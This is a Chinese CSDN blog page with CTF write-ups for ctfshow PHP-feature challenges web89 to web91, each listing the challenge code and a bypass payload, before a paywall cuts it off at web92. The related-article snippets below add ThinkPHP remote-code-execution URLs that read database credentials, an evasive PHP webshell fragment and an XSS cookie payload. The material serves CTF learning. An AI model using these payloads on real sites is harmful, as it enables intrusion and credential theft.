show web php特性 payload

已于 2022-07-01 23:09:34 修改
阅读量301 收藏
点赞数
文章标签: php 开发语言
于 2022-06-17 12:15:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53217892/article/details/125326705
版权

web89

include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

payload  num[]=1

------------------------------------------------------------------------------------------

web90

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

payload=?num=4476.0

 ------------------------------------------------------------------------------------------

web91

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}

/i表示大小写   ,/m表示多行匹配    ^表示匹配字符串开始,$匹配字符串结尾

payload cmd=%0aphp

------------------------------------------------------------------------------------------

web92

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(i
最低0.47元/天 解锁文章
2h4ox1n9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php构造payload,Thinkphp远程代码执行 payload汇总
weixin_39837867的博客
03-25 1192
Thinkphp 5.0.22http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.usernamehttp://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.passwordhttp://url/to/think...
payload-dumper-解包
03-22
在IT行业中,"payload-dumper-解包"这个主题涉及到的是对特定文件格式的解析,尤其是针对payload.bin文件。Payload.bin通常是一种二进制文件,它可能包含各种系统数据、固件更新或者其他形式的执行代码,用于在目标...
PHP免杀payload分享
INK
05-08 374
作为持续分享本文会持续更新,一直处于编辑状态 php: <?php substr(__FILE__, -10,-4)(phpinfo()); ?>```
php处理请求中Request Payload参数的方法
weixin_34226182的博客
05-15 4358
昨天晚上 开发一个功能发现,在ant design前端页面发出的请求如果是post的时候,参数会在 Request Payload中追加。此时,在服务器端php的$_POST无法解析,由于时间紧迫 没有去找ant design的request的实现。(主要是参照下面方法没解决问题) headers: { 'Content-Type': 'application/x-www-...
php 获取post方法payload(json)形式参数的方法
cominglately的博客
05-21 9955
场景 . vue-resource发送了一个post请求,在后台$_POST都获取不到数据 解决 $request_body = file_get_contents('php://input'); $data = json_decode($request_body, true);
PHP命令执行集锦
蚁景网安学院
03-21 2353
代码审计总要遇到命令执行或者说RCE,打CTF的过程中难免不会碰见,毕竟PHP是世界上最好的语言,总结一下...
PHP XML error parsing SOAP payload on line 1
10-29
PHP开发过程中,当遇到"PHP XML error parsing SOAP payload on line 1"的错误提示时,这通常意味着在解析SOAP消息体(payload)时遇到了XML编码问题。此问题的根源通常在于字符编码不匹配,特别是在涉及到多层...
php JWT在web端中的使用方法教程
12-20
**PHP中的JWT(JSON Web Tokens)使用教程** JWT(JSON Web Token)是一种轻量级的身份验证机制,常用于Web应用程序,尤其是API身份验证。JWT通过一个由三部分组成的字符串来代表用户的身份信息,无需传统的Cookie...
通过随机异或和加密payload动态免杀所有php文件
最新发布
03-12
标题中的“通过随机异或和加密payload动态免杀所有php文件”揭示了本文将探讨如何利用随机异或操作和加密技术来实现PHP代码的安全保护,防止恶意攻击者对PHP文件进行逆向工程分析或者篡改。这个话题涉及到网络安全、...
payload_dumper.zip
01-25
"payload_dumper.zip" 是一个专门用于处理Android AB(Advanced Boot)更新包的工具,它能够帮助开发者或技术人员对payload.bin文件进行解包,以便于分析、调试或者定制系统更新流程。下面我们将深入探讨Android AB...
2021-03-20
qq_43855980的博客
03-20 353
Cross-Site scripting 反射型xss(get) 分析代码,发现该形式只依靠前端识别message内容后直接传送,没任何限制,在输入框或者url上直接输入payload:<script>alert(document.cookie)</script> 弹出对话框包含了cookie 反射型xss (post) 分析代码,发现该形式需要先登录进入后可以输入payload<script>alert(document.cookie)</...
web漏洞】PHP反序列化
weixin_51614272的博客
04-25 3418
知识点 PHP反序列化只能修改成员变量的值和构造方法,其他的代码区不能修改
Thinkphp框架漏洞payload整合
weixin_51339377的博客
04-11 2213
PS:针对不同的情况有些payload可能不适用 可以都尝试尝试 一定要自己审计理解原理 部分payload来源以及合集来源: ​​​​​​ThinkPHP漏洞复现_半盏时光、旧梦悠长的博客-CSDN博客_thinkphp复现 深入学习理解可以参考如上的链接地址 Thinkphp 5.0.5-5.0.22 Thinkphp 5.1.0-5.1.30 远程代码执行漏洞(5.0.20最适用) payload如下:(这是执行system函数的payload) 在index.php后把响应内容..
AJAX POST请求中参数以form data和request payload形式在php中的获取方式
热门推荐
NiluChen的专栏
09-11 2万+
一.MINE TYPE问题: php对mime type为“application/x-www-form-urlencoded”(表单提交)和“multipart/form-data”(文件上传)的Post请求的数据作特殊处理 下面以“multipart/form-data”为例对源码进行解析: 当客户端发起文件提交请求时,Apache会将所接收到的内容转交给mod_php5模块
PHP中的命令执行与代码执行
qq_51754713的博客
10-04 3161
title: PHP中的命令执行与代码执行 data: 2021-09-15 tags: CTF-web PHP中的命令执行与代码执行 最近在复习之前学过得知识点。因为之前是0基础来学习的,所以很多东西可能是没有弄懂的。现在重新回顾一下命令执行这一块。学到了不少的知识。 然后题目的话全都是来源于CTFSHOW的web入门。 对我这种新手来说真是太友好了! 命令执行与代码执行 在PHP中我们首先要搞清楚什么是代码执行,什么是命令执行。 通俗一点讲,代码执行是执行PHP代码。命令执行是执行linux系统下.
PHP代码执行漏洞
Jim的博客
08-16 2892
代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。 危险函数执行PHP代码的有: eval(), assert(), preg_replace(), call_user_func(), call_user_func_array(), create_function(), array_map()等。 1.eval()和assert()函数本
PHP代码/命令执行漏洞总结
坚持硬核
02-04 2036
由于没有针对代码中可执行的特殊函数入口做过滤,导致用户可以提交恶意语句,并交由服务器端执行。 代码/命令注入攻击中Web服务器没有过滤类似system(),eval(),exec()等函数的传入参数是该漏洞攻击成功的最主要原因。 代码注入相关函数: 1.mixed eval(string code_str) eval() 把字符串作为PHP代码执行 code_str是PHP代码字符串 2.bool assert ( mixed $assertion [, string $description
ctfshow(卷王杯)
qq_62046696的博客
09-24 1476
首先我们的前提是if(isset($_POST['a']) && isset($_POST['b']) && isset($_POST['c']))} 这里的name就是上面的string传进来的,但是 $var = $this->$name;array_walk函数的作用就是遍历自定义函数,其中$fn的值为成员的值,prev为成员变量的名字。这是个等于号,相当于赋值,而对于数组无法赋值的情况就是当键溢出就行,可以看到上一句有。如果是数组的话,第一个是类,第二个是方法,第三个是属性。
PHP伪协议
YV_LING的博客
11-06 339
CTF比赛中关于PHP伪协议的使用。
ctf.show_web9
10-21
ctf.show_web9是一个CTF比赛中的一个web安全题目,考察的是命令执行漏洞的利用方式。这一关需要使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag。具体来说,需要通过构造payload,将命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值